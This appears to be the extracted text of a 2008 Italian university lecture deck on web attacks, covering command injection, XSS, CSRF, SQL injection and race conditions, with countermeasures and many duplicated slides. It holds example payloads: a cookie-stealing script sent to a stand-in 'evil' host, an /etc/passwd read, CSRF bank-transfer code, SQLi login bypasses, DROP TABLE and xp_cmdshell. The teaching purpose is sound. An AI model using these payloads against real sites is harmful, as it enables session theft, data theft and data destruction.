Sicurezza delle applicazioni web: attacchi web

annuncio pubblicitario
Università degli Studi di Milano
Facoltà di Scienze Matematiche, Fisiche e Naturali
Anno Accademico 2008/2009
Sicurezza delle applicazioni web: attacchi web
Roberto Paleari, Emanuele Passerini
16 Dicembre 2008
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
1 / 32
Sommario
1
Introduzione
2
Command injection
3
Attacchi client-side: CSS e CSRF
Cross-Site Scripting
Cross-Site Request Forgery
4
Attacchi server-side: SQL injection
Esempi
Tecniche d’attacco
5
Problemi di concorrenza
6
Bibliografia
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
2 / 32
OWASP Top Ten (2007)
1
Cross Site Scripting (XSS)
2
injection flaws
3
malicious file execution
4
insecure direct object reference
5
Cross Site Request Forgery (CSRF)
6
information leakage and improper error handling
7
broken authentication and session management
8
insecure cryptographic storage
9
insecure communications
10
failure to restrict URL access
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
3 / 32
Command injection
Esecuzione di comandi sul server
i linguaggi di lato server consentono l’esecuzione di comandi
(e.g., system(), exec(), popen())
nome del comando e argomenti sono passati tramite stringa
a volte nome/argomenti sono generati dinamicamente
⇒ mancata sanitizzazione può introdurre vulnerabilità
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
4 / 32
Command injection
Esempio
Ricerca di uno User-Agent nei log
1
2
3
...
system(’cut −d \” −f 6 /var/log/apache2/access.log | grep −i ’. $ GET[’chiave’]);
...
Altri tipi di command injection
interpretazione dinamica di codice (e.g.,
eval())
inclusione di file remoti (e.g., in PHP,
http://www.ex.com/script.php?include=http://www.evil.it/file.php)
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
5 / 32
Command injection
Esempio
Ricerca di uno User-Agent nei log
1
2
3
...
system(’cut −d \” −f 6 /var/log/apache2/access.log | grep −i ’. $ GET[’chiave’]);
...
⇒ http://www.ex.com/user_agent_stat.php?chiave=a;%20cat%20/etc/passwd
Altri tipi di command injection
interpretazione dinamica di codice (e.g.,
eval())
inclusione di file remoti (e.g., in PHP,
http://www.ex.com/script.php?include=http://www.evil.it/file.php)
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
5 / 32
Command injection
Esempio
Ricerca di uno User-Agent nei log
1
2
3
...
system(’cut −d \” −f 6 /var/log/apache2/access.log | grep −i ’. $ GET[’chiave’]);
...
⇒ http://www.ex.com/user_agent_stat.php?chiave=a;%20cat%20/etc/passwd
Altri tipi di command injection
interpretazione dinamica di codice (e.g.,
eval())
inclusione di file remoti (e.g., in PHP,
http://www.ex.com/script.php?include=http://www.evil.it/file.php)
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
5 / 32
Attacchi client-side
Cross-Site Scripting (XSS) e Cross-Site Request Forgery (CSRF)
sfruttano la fiducia che un utente ha di un sito web (XSS), o
viceversa (CSRF)
attacco: modificare la pagina HTML originale, aggiungendo
codice (HTML o JavaScript)
la vittima si collega al server vulnerabile che restituisce la
pagina modificata (e.g., link in e-mail, IM, link sulla rete)
il browser interpreta il codice iniettato dall’attaccante
Esempi di obiettivi dell’attacco
1
ottenere cookie associati al dominio vulnerabile
2
manipolazione form di login
3
esecuzione di GET/POST addizionali
4
. . . qualunque cosa si possa fare con HTML + JavaScript!
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
6 / 32
Cross-Site Scripting
Obiettivo
accesso non autorizzato ad informazioni presenti sul client
Di cosa si tratta?
attacco basato sulla mancanza di controlli sull’input
alterazione della pagina web originale, con aggiunta di codice
JavaScript o HTML
il browser del client, “fidandosi” del server web, interpreta la
pagina modificata
i dati che si possono ottenere dipendono dalla policy di
sicurezza JavaScript (e.g., no file ma cookie)
molto (troppo. . . ) diffusi!
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
7 / 32
Reflected Cross-Site Scripting
Funzionamento
una pagina dinamica è vulnerabile a XSS
l’utente è indotto a accedere alla pagina vulnerabile
l’exploit è contenuto nell’URL
Esempio:
http://vulnerabile/a.php?var=<script>document.location=’http:
//evil/log.php?’+document.cookie</script>
Offuscamento
tecniche di encoding
nascondere il link con l’exploit dalla barra di stato
un link innocuo effettua un redirect (HTTP 3xx)
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
8 / 32
Reflected Cross-Site Scripting
Esempio
sul server c’è una pagina PHP che contiene:
Benvenuto <?php echo $_GET[’nome’]; ?>
la vittima clicca sul seguente link:
<a href="http://vulnerabile/vuln.php?nome=<script>document.location=
’http://evil/log.php?’+document.cookie</script>" >link</a>
il browser crea la seguente richiesta HTTP:
GET /vuln.php?nome=%3Cscipt%3Edocument.location%3D
%27http%3A%2F%2Fevil%2Flog.php%3F%27%2B
document.cookie%3C%2Fscript%3E
Host: vulnerabile
...
risultato HTML prodotto dal server:
Benvenuto <script>document.location=
’http://evil/log.php?’+document.cookie</script>
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
9 / 32
Reflected Cross-Site Scripting
Esempio
sul server c’è una pagina PHP che contiene:
Benvenuto <?php echo $_GET[’nome’]; ?>
la vittima clicca sul seguente link:
<a href="http://vulnerabile/vuln.php?nome=<script>document.location=
’http://evil/log.php?’+document.cookie</script>" >link</a>
il browser crea la seguente richiesta HTTP:
GET /vuln.php?nome=%3Cscipt%3Edocument.location%3D
%27http%3A%2F%2Fevil%2Flog.php%3F%27%2B
document.cookie%3C%2Fscript%3E
Host: vulnerabile
...
risultato HTML prodotto dal server:
Benvenuto <script>document.location=
’http://evil/log.php?’+document.cookie</script>
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
9 / 32
Reflected Cross-Site Scripting
Esempio
sul server c’è una pagina PHP che contiene:
Benvenuto <?php echo $_GET[’nome’]; ?>
la vittima clicca sul seguente link:
<a href="http://vulnerabile/vuln.php?nome=<script>document.location=
’http://evil/log.php?’+document.cookie</script>" >link</a>
il browser crea la seguente richiesta HTTP:
GET /vuln.php?nome=%3Cscipt%3Edocument.location%3D
%27http%3A%2F%2Fevil%2Flog.php%3F%27%2B
document.cookie%3C%2Fscript%3E
Host: vulnerabile
...
risultato HTML prodotto dal server:
Benvenuto <script>document.location=
’http://evil/log.php?’+document.cookie</script>
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
9 / 32
Reflected Cross-Site Scripting
Esempio
sul server c’è una pagina PHP che contiene:
Benvenuto <?php echo $_GET[’nome’]; ?>
la vittima clicca sul seguente link:
<a href="http://vulnerabile/vuln.php?nome=<script>document.location=
’http://evil/log.php?’+document.cookie</script>" >link</a>
il browser crea la seguente richiesta HTTP:
GET /vuln.php?nome=%3Cscipt%3Edocument.location%3D
%27http%3A%2F%2Fevil%2Flog.php%3F%27%2B
document.cookie%3C%2Fscript%3E
Host: vulnerabile
...
risultato HTML prodotto dal server:
Benvenuto <script>document.location=
’http://evil/log.php?’+document.cookie</script>
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
9 / 32
Reflected Cross-Site Scripting
Esempio
sul server c’è una pagina PHP che contiene:
Benvenuto <?php echo $_GET[’nome’]; ?>
la vittima clicca sul seguente link:
<a href="http://vulnerabile/vuln.php?nome=<script>document.location=
’http://evil/log.php?’+document.cookie</script>" >link</a>
il browser crea la seguente richiesta HTTP:
GET /vuln.php?nome=%3Cscipt%3Edocument.location%3D
%27http%3A%2F%2Fevil%2Flog.php%3F%27%2B
document.cookie%3C%2Fscript%3E
Host: vulnerabile
...
risultato HTML prodotto dal server:
Benvenuto <script>document.location=
’http://evil/log.php?’+document.cookie</script>
Il browser interpreta il codice JavaScript, legge i Cookie
della vittima per il dominio “vulnerabile”, si collega al sito evil
e li passa in GET
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
9 / 32
Stored Cross-Site Scripting
Fase 1
l’attaccante invia al server il codice da iniettare
il server memorizza in modo persistente il codice (e.g.,
database, file, messaggio inserito in un forum)
il codice dell’attacco non è visibile nell’URL
Fase 2
il client si collega al server
il server genera la pagina inserendo anche il codice iniettato
Osservazioni
tutti gli utenti che richiederanno la pagina subiranno l’attacco
il codice ineittato non è visibile nell’URL
molto più pericoloso rispetto ai reflected!
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
10 / 32
Cross-Site Request Forgery
Obiettivo
far eseguire delle azioni alle vittime, sfruttando le loro credenziali
(e.g., cookie di sessione)
con JavaScript non è possibile accedere ai cookie di un altro
dominio
XSS ⊂ CSRF, ossia XSS =⇒ CSRF
CSRF è possibile anche senza XSS
CSRF reflected e stored
samy is my hero → virus JavaScript che sfrutta CSRF
. . . forse non ancora utilizzati per creare danni tangibili
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
11 / 32
Stored CSRF (GET)
Esempio stored CSRF in sito maligno
il client si collega a http://www.mia-banca.it/ e si
autentica
il client apre un’altra istanza del browser (tab o finestra) e si
collega ad un sito maligno
la pagina maligna contiene qualcosa del tipo:
<img src=”http://www.mia−banca.it/traferisci.php?to=1337&amount=10000”/>
il browser crea una richiesta HTTP nella quale inserisce i
parametri GET e inserisce il Cookie con l’ID di sessione
appropriato
Osservazioni
in JavaScript, utilizzando i form HTML si possono creare
qualsiasi tipo di richieste HTTP (sia GET che POST)
il sito maligno non deve essere necessariamente dinamico!
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
12 / 32
Stored CSRF (POST)
Esempio stored CSRF nel target
Assunzione
l’attaccante ha il pieno accesso alla pagina HTML e può usare AJAX
la vittima si collega a http://www.banca-vulnerabile.it
e si autentica
la vittima richiede la pagina che contiene il codice dell’attacco
il server (oltre alla pagine) restituisce:
1
2
3
4
5
6
7
8
var http = false; var body = ”to=1337&amount=10000”;
http = new XMLHttpRequest();
http.onreadystatechange = handleResponse;
http.open(”POST”, ”http://www.banca−vulnerabile.it/trasferisci.php”, true);
http.setRequestHeader(”Content−type”, ”application/x−www−form−urlencoded”);
http.setRequestHeader(”Content−length”, body.length);
http.send(body);
function handleResponse() { .... }
per banca-vulnerabile, la richiesta è indistinguibile da una
“lecita”
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
13 / 32
XSS/CSRF: Contromisure
Lato client
reflected XSS: se l’attacco è visibile nella URL può essere
facilmente evitato passando dalla root del dominio
estensioni per Firefox: noscript (JavaScript su richiesta)
non visitare altri siti quando utilizza il conto on-line, effettuare
sempre il logout
Lato server
l’input va sempre considerato insicuro, vanno applicate le
corrette funzioni di sanitizzazione (e.g., htmlspecialchars())
Per CSRF:
CAPTCHA (funzionano sempre?), PIN da inserire per ogni
transazione importante
per quelli su un siti esterni si potrebbe passare una chiave tra
le varie pagine dell’applicazione (e.g., campi hidden)
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
14 / 32
SQL injection (SQLI)
Scenario
molte applicazioni web hanno la necessità di memorizzare dati
strutturati (e.g., forum, CMS, e-commerce, blog, . . . )
⇒ database
SQLI
mancata validazione dell’input
le query generate dall’applicazione contengono input
si ha SQLI quando, manipolando l’input, è possibile
modificare sintatticamente o semanticamente una query SQL
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
15 / 32
SQL injection
Esempio (PHP)
1
2
3
4
5
6
7
8
$nome = $ POST[’nome’];
$passw = $ POST[’passw’];
$result = mysql query(”SELECT ∗ FROM Utenti ” .
”WHERE nome=’$nome’ AND passw=’$passw’;”);
if(mysql num rows($result) > 0 ) {
...
}
1
nome = mario ∧ passw = xyz
→ ... WHERE nome=’mario’ AND passw=’xyz’;
2
nome = admin ∧ passw = xyz’ OR ’1’=’1
→ ... WHERE nome=’admin’ AND passw=’xyz’ OR ’1’=’1’;
. . . quali righe seleziona l’ultima query?
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
16 / 32
SQLI: Sorgenti d’iniezione
Input utente e header HTTP
Input dell’utente
parametri GET/POST
molte tecnologie client-side comunicano col server tramite
GET/POST (e.g., Flash, applet Java, AJAX)
Header HTTP
tutti gli header HTTP devono essere considerati pericolosi
User-Agent,Referer,. . . possono essere stati manipolati
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
17 / 32
SQLI: Sorgenti d’iniezione
Cookie e second order injection
Cookie
sono header aggiuntivi
non modificabili da un normale browser
provengono dal client ⇒ pericolosi
Second order injection
l’input viene memorizzato dall’applicazione (file,database)
successivamente, l’input è utilizzato per la costruzione di
query SQL
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
18 / 32
SQLI: Obiettivi dell’attacco
identificazione dei parametri iniettabili: analizzare
l’applicazione per scoprire le sorgenti d’iniezione
database footprinting: scoprire tipo e versione del DBMS in
uso; facilitato da una gestione inadeguata degli errori
determinazione del DB schema: nomi delle tabelle, nome e
tipo delle colonne
estrazione dati: estrazione di dati (sensibili) dal database
manipolazione dei dati: inserimento, modifica o cancellazione
dei dati
denial of service: impedire l’uso dell’applicazione ad altri
utenti (LOCK, DELETE, . . . )
bypassing dell’autenticazione: eludere un meccanismo di
autenticazione
esecuzione remota di comandi: esecuzione di comandi (esterni
al DBMS, stored procedure)
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
19 / 32
SQLI: Alcuni esempi
Bypass dell’autenticazione tramite “tautologie”
query dell’applicazione:
$q = ”SELECT id FROM utente WHERE user=’”.$user.”’ AND pass=’”.$pass.”’”;
parametri inviati dall’attaccante:
$user = ”admin”;
$pass = ”’ OR ’1’=’1”;
query eseguita dall’applicazione:
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’’ OR ’1’=’1’”;
se l’applicazione Web avesse sanitizzato l’input (e.g.,
mysql escape string()):
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’\’ OR \’\’=\’’”;
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
20 / 32
SQLI: Alcuni esempi
Bypass dell’autenticazione tramite “tautologie”
query dell’applicazione:
$q = ”SELECT id FROM utente WHERE user=’”.$user.”’ AND pass=’”.$pass.”’”;
parametri inviati dall’attaccante:
$user = ”admin”;
$pass = ”’ OR ’1’=’1”;
query eseguita dall’applicazione:
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’’ OR ’1’=’1’”;
se l’applicazione Web avesse sanitizzato l’input (e.g.,
mysql escape string()):
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’\’ OR \’\’=\’’”;
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
20 / 32
SQLI: Alcuni esempi
Bypass dell’autenticazione tramite “tautologie”
query dell’applicazione:
$q = ”SELECT id FROM utente WHERE user=’”.$user.”’ AND pass=’”.$pass.”’”;
parametri inviati dall’attaccante:
$user = ”admin”;
$pass = ”’ OR ’1’=’1”;
query eseguita dall’applicazione:
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’’ OR ’1’=’1’”;
se l’applicazione Web avesse sanitizzato l’input (e.g.,
mysql escape string()):
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’\’ OR \’\’=\’’”;
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
20 / 32
SQLI: Alcuni esempi
Bypass dell’autenticazione tramite “tautologie”
query dell’applicazione:
$q = ”SELECT id FROM utente WHERE user=’”.$user.”’ AND pass=’”.$pass.”’”;
parametri inviati dall’attaccante:
$user = ”admin”;
$pass = ”’ OR ’1’=’1”;
query eseguita dall’applicazione:
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’’ OR ’1’=’1’”;
se l’applicazione Web avesse sanitizzato l’input (e.g.,
mysql escape string()):
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’\’ OR \’\’=\’’”;
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
20 / 32
SQLI: Alcuni esempi
Altre “tautologie”
utilizzo di commenti SQL inline per evitare di terminare
correttamente la query
$pass = ”’ OR 1=1 −− ”;
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’’ OR 1=1 – ’”;
$pass = ”’ OR 1 −− ”;
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’’ OR 1 – ’”;
$user = ”admin’ #”;
$q = ”SELECT id FROM utente WHERE user=’admin’ #’ AND pass=’’”;
scelta “blind” del primo user disponibile
$user = ”’ OR user LIKE ’%’ #”;
$q = ”SELECT id FROM utente WHERE user=’’ OR user LIKE ’%’ #’ AND pass=’’”;
$user = ”’ OR 1 # ”;
$q = ”SELECT id FROM utente WHERE user=’’ OR 1 #’ AND pass=’’”;
elusione di IDS
$pass = ”’ OR 5>4 OR password=’prova”;
$pass = ”’ OR ’vulnerabilita’>’server”;
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
21 / 32
SQLI: Alcuni esempi
Altre “tautologie”
utilizzo di commenti SQL inline per evitare di terminare
correttamente la query
$pass = ”’ OR 1=1 −− ”;
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’’ OR 1=1 – ’”;
$pass = ”’ OR 1 −− ”;
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’’ OR 1 – ’”;
$user = ”admin’ #”;
$q = ”SELECT id FROM utente WHERE user=’admin’ #’ AND pass=’’”;
scelta “blind” del primo user disponibile
$user = ”’ OR user LIKE ’%’ #”;
$q = ”SELECT id FROM utente WHERE user=’’ OR user LIKE ’%’ #’ AND pass=’’”;
$user = ”’ OR 1 # ”;
$q = ”SELECT id FROM utente WHERE user=’’ OR 1 #’ AND pass=’’”;
elusione di IDS
$pass = ”’ OR 5>4 OR password=’prova”;
$pass = ”’ OR ’vulnerabilita’>’server”;
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
21 / 32
SQLI: Alcuni esempi
Altre “tautologie”
utilizzo di commenti SQL inline per evitare di terminare
correttamente la query
$pass = ”’ OR 1=1 −− ”;
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’’ OR 1=1 – ’”;
$pass = ”’ OR 1 −− ”;
$q = ”SELECT id FROM utente WHERE user=’admin’ AND pass=’’ OR 1 – ’”;
$user = ”admin’ #”;
$q = ”SELECT id FROM utente WHERE user=’admin’ #’ AND pass=’’”;
scelta “blind” del primo user disponibile
$user = ”’ OR user LIKE ’%’ #”;
$q = ”SELECT id FROM utente WHERE user=’’ OR user LIKE ’%’ #’ AND pass=’’”;
$user = ”’ OR 1 # ”;
$q = ”SELECT id FROM utente WHERE user=’’ OR 1 #’ AND pass=’’”;
elusione di IDS
$pass = ”’ OR 5>4 OR password=’prova”;
$pass = ”’ OR ’vulnerabilita’>’server”;
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
21 / 32
Tecniche d’attacco SQLI
UNION Query
obiettivo: reperire informazioni sensibili il cui accesso è legato a
criteri di autorizzazione
esempio di query:
$q = ”SELECT id, nome, prezzo, descrizione” .
”FROM prodotto WHERE categoria=” . $ GET[’cat’];
parametri passati dall’attaccante:
$cat = ”1 UNION SELECT 1, user, 1, pass FROM utente”;
numero e tipo di colonne della prima
con quelli della seconda
SELECT
devono coincidere
MySQL: una mancata corrispondenza fra i tipi provoca cast
automatici
$cat = ”1 UNION SELECT 1, 1, user, pass FROM utente”;
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
22 / 32
Tecniche d’attacco SQLI
Second order injection
obiettivo: far si che un parametro inizialmente innocuo diventi
successivamente pericoloso
username inserito dall’attaccante:
$user = ”admin’#”;
durante l’inserimento nel database, $user viene sanitizzato
correttamente
l’utente chiede di cambiare la propria password, ma i dati non
sono correttamente sanitizzati:
$q = ”UPDATE utente SET pass=’” . $ POST[’newPass’] . ”’
WHERE user=’” . $row[’user’] . ”’”;
query eseguita dall’applicazione:
$q = ”UPDATE utente SET pass=’password’ WHERE user=’admin’#’”;
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
23 / 32
Tecniche d’attacco SQLI
Second order injection
obiettivo: far si che un parametro inizialmente innocuo diventi
successivamente pericoloso
username inserito dall’attaccante:
$user = ”admin’#”;
durante l’inserimento nel database, $user viene sanitizzato
correttamente
l’utente chiede di cambiare la propria password, ma i dati non
sono correttamente sanitizzati:
$q = ”UPDATE utente SET pass=’” . $ POST[’newPass’] . ”’
WHERE user=’” . $row[’user’] . ”’”;
query eseguita dall’applicazione:
$q = ”UPDATE utente SET pass=’password’ WHERE user=’admin’#’”;
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
23 / 32
Tecniche d’attacco SQLI
Piggy-backed
obiettivo: eseguire un numero arbitrario di query, separate da“;”
esempio di query:
$q = ”SELECT id FROM utente WHERE user=’” . $user .
”’ AND pass=’” . $pass . ”’”;
parametri passati dall’attaccante:
$user = ”’; DROP TABLE utente −− ”;
query eseguita dall’applicazione:
$q = ”SELECT id FROM utente WHERE user=’’; DROP TABLE utente – ’ AND pass=”;
entrambe le query vengono eseguite!
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
24 / 32
Tecniche d’attacco SQLI
Piggy-backed
obiettivo: eseguire un numero arbitrario di query, separate da“;”
esempio di query:
$q = ”SELECT id FROM utente WHERE user=’” . $user .
”’ AND pass=’” . $pass . ”’”;
parametri passati dall’attaccante:
$user = ”’; DROP TABLE utente −− ”;
query eseguita dall’applicazione:
$q = ”SELECT id FROM utente WHERE user=’’; DROP TABLE utente – ’ AND pass=”;
entrambe le query vengono eseguite!
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
24 / 32
Tecniche d’attacco SQLI
Query illogica-Illegale
obiettivo: recuperare informazioni su tabelle, DBMS, . . .
esempio di attacco:
$user = ”’ HAVING 1=1 −− ”;
query eseguita dall’applicazione:
SELECT ∗ FROM users WHERE username=’’ HAVING 1=1 – ’ AND password=’’
possibile risposta del server:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e14’
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ’users.id’ is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
/process_login.asp, line 35
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
25 / 32
Tecniche d’attacco SQLI
Stored Procedure
obiettivo: esecuzione di comandi remoti (stored procedure)
MSSQL mette a disposizione circa 1000 stored procedure, per
gestione database, creazione tabelle, gestione dati esterni, . . .
xp cmdshell consente l’esecuzione di comandi sulla macchina
esempio:
’; EXEC master..xp cmdshell ’dir c:’ −−
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
26 / 32
SQLI: Contromisure
Sanitizzazione dei dati
affidata ai programmatori
i programmatori spesso si affidano a metodi “automagici”
(e.g., in PHP, magic quotes gpc fa escaping tramite
addslashes())
la sanitizzazione dipende dall’attacco contro cui ci si vuole
proteggere!
sanitizzazione tramite regexp può essere “tricky”
se ci aspetta un numero come parametro, verificare che sia
tale
. . . è possibile costruire stringhe senza utilizzare apici
(AAA ⇔ char(65,65,65))
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
27 / 32
Concurrency in web applications: an introduction
Single request
web browser
page request
web server
spawn new worker
interpreter
script
DB
Roberto Paleari, Emanuele Passerini
Attacchi web
query
16 Dicembre 2008
28 / 32
Concurrency in web applications: an introduction
Multiple parallel requests
web browser1
web browser2
page request
page request
web server
spawn new worker
interpreter
interpreter
script
script
query
Roberto Paleari, Emanuele Passerini
spawn new worker
DB
Attacchi web
query
16 Dicembre 2008
28 / 32
Concurrency in web applications: an introduction
Multiple parallel requests
web browser1
web browser2
page request
page request
web server
spawn new worker
spawn new worker
interpreter
interpreter
script
script
concurrent DB access
query
Roberto Paleari, Emanuele Passerini
DB
Attacchi web
query
16 Dicembre 2008
28 / 32
Concurrency in web applications
web apps are made of different scripts that perform
well-defined, sequential tasks
scripts usually access some shared resources (e.g., a database)
multiple script instances can be executed concurrently
race conditions are well known, but their impact on web
applications has not been investigated
Problem
web programmers do not conceive their applications as
multi-threaded or multi-process entities
unexpected parallelism can lead to unforeseen interactions
parallelism can be controlled client-side
synchronization primitives are seldom used, and their efficacy
is often system-dependent
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
29 / 32
Concurrency in web applications
web apps are made of different scripts that perform
well-defined, sequential tasks
scripts usually access some shared resources (e.g., a database)
multiple script instances can be executed concurrently
race conditions are well known, but their impact on web
applications has not been investigated
Problem
web programmers do not conceive their applications as
multi-threaded or multi-process entities
unexpected parallelism can lead to unforeseen interactions
parallelism can be controlled client-side
synchronization primitives are seldom used, and their efficacy
is often system-dependent
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
29 / 32
Concurrency in web applications
Motivating example
1
2
3
4
5
6
$res = mysql_query(SELECT credit FROM Users WHERE id=$id);
$row = mysql_fetch_assoc($res);
if($row[’credit’] >= 800) {
<execute the requested operation>
$new_credit = $row[’credit’] - 800;
$res = mysql_query(UPDATE Users SET credit=$new_credit .
WHERE id=$id);
}
P1
Line
P2
Data
Roberto Paleari, Emanuele Passerini
Line
Data
Attacchi web
Database
ID
Credit
50
2500
92
820
123
1000
205
1200
...
...
16 Dicembre 2008
30 / 32
Concurrency in web applications
Motivating example
1
2
3
4
5
6
$res = mysql_query(SELECT credit FROM Users WHERE id=$id);
$row = mysql_fetch_assoc($res);
if($row[’credit’] >= 800) {
<execute the requested operation>
$new_credit = $row[’credit’] - 800;
$res = mysql_query(UPDATE Users SET credit=$new_credit .
WHERE id=$id);
}
P1
Line
2
Data
(id: 123, credit: 1000)
Roberto Paleari, Emanuele Passerini
P2
Line
⊥
Data
⊥
Attacchi web
Database
ID
Credit
50
2500
92
820
123
1000
205
1200
...
...
16 Dicembre 2008
30 / 32
Concurrency in web applications
Motivating example
1
2
3
4
5
6
$res = mysql_query(SELECT credit FROM Users WHERE id=$id);
$row = mysql_fetch_assoc($res);
if($row[’credit’] >= 800) {
<execute the requested operation>
$new_credit = $row[’credit’] - 800;
$res = mysql_query(UPDATE Users SET credit=$new_credit .
WHERE id=$id);
}
P1
Line
2
4
Data
(id: 123, credit: 1000)
(id: 123, credit: 1000)
Roberto Paleari, Emanuele Passerini
P2
Line
⊥
1
Data
⊥
⊥
Attacchi web
Database
ID
Credit
50
2500
92
820
123
1000
205
1200
...
...
16 Dicembre 2008
30 / 32
Concurrency in web applications
Motivating example
1
2
3
4
5
6
$res = mysql_query(SELECT credit FROM Users WHERE id=$id);
$row = mysql_fetch_assoc($res);
if($row[’credit’] >= 800) {
<execute the requested operation>
$new_credit = $row[’credit’] - 800;
$res = mysql_query(UPDATE Users SET credit=$new_credit .
WHERE id=$id);
}
P1
Line
2
4
4
Data
(id: 123, credit: 1000)
(id: 123, credit: 1000)
(id: 123, credit: 1000)
Roberto Paleari, Emanuele Passerini
P2
Line
⊥
1
2
Data
⊥
⊥
(id: 123, credit: 1000)
Attacchi web
Database
ID
Credit
50
2500
92
820
123
1000
205
1200
...
...
16 Dicembre 2008
30 / 32
Concurrency in web applications
Motivating example
1
2
3
4
5
6
$res = mysql_query(SELECT credit FROM Users WHERE id=$id);
$row = mysql_fetch_assoc($res);
if($row[’credit’] >= 800) {
<execute the requested operation>
$new_credit = $row[’credit’] - 800;
$res = mysql_query(UPDATE Users SET credit=$new_credit .
WHERE id=$id);
}
P1
Line
2
4
4
5
(id:
(id:
(id:
(id:
Data
123, credit:
123, credit:
123, credit:
123, credit:
Roberto Paleari, Emanuele Passerini
P2
1000)
1000)
1000)
1000)
Line
⊥
1
2
4
Data
⊥
⊥
(id: 123, credit: 1000)
(id: 123, credit: 1000)
Attacchi web
Database
ID
Credit
50
2500
92
820
123
1000
205
1200
...
...
16 Dicembre 2008
30 / 32
Concurrency in web applications
Motivating example
1
2
3
4
5
6
$res = mysql_query(SELECT credit FROM Users WHERE id=$id);
$row = mysql_fetch_assoc($res);
if($row[’credit’] >= 800) {
<execute the requested operation>
$new_credit = $row[’credit’] - 800;
$res = mysql_query(UPDATE Users SET credit=$new_credit .
WHERE id=$id);
}
P1
Line
2
4
4
5
(id:
(id:
(id:
(id:
Data
123, credit:
123, credit:
123, credit:
123, credit:
Roberto Paleari, Emanuele Passerini
P2
1000)
1000)
1000)
1000)
Line
⊥
1
2
4
Data
⊥
⊥
(id: 123, credit: 1000)
(id: 123, credit: 1000)
Attacchi web
Database
ID
Credit
50
2500
92
820
123
200
205
1200
...
...
16 Dicembre 2008
30 / 32
Concurrency in web applications
Motivating example
1
2
3
4
5
6
$res = mysql_query(SELECT credit FROM Users WHERE id=$id);
$row = mysql_fetch_assoc($res);
if($row[’credit’] >= 800) {
<execute the requested operation>
$new_credit = $row[’credit’] - 800;
$res = mysql_query(UPDATE Users SET credit=$new_credit .
WHERE id=$id);
}
P1
Line
2
4
4
5
(id:
(id:
(id:
(id:
Data
123, credit:
123, credit:
123, credit:
123, credit:
Roberto Paleari, Emanuele Passerini
P2
1000)
1000)
1000)
1000)
Line
⊥
1
2
4
Data
⊥
⊥
(id: 123, credit: 1000)
(id: 123, credit: 1000)
Attacchi web
Database
ID
Credit
50
2500
92
820
123
200
205
1200
...
...
16 Dicembre 2008
30 / 32
Concurrency in web applications
Some experimental results
Application
Joomla! 1.5RC4
phpBB 3.0.0
WordPress 2.3.2
Zen Cart 1.3.8a
Category
CMS
forum
blog/CMS
shopping cart
Queries
4086
2236
3638
35194
FP
0
0
0
0
TP
55 (2)
35 (4)
47 (4)
46 (1)
What kind of vulnerabilities did we find?
Highly application-dependent. Some examples:
bypass brute force checks
vote multiple times with parallel vote requests
circumvent anti-flooding features
Roberto Paleari, Emanuele Passerini
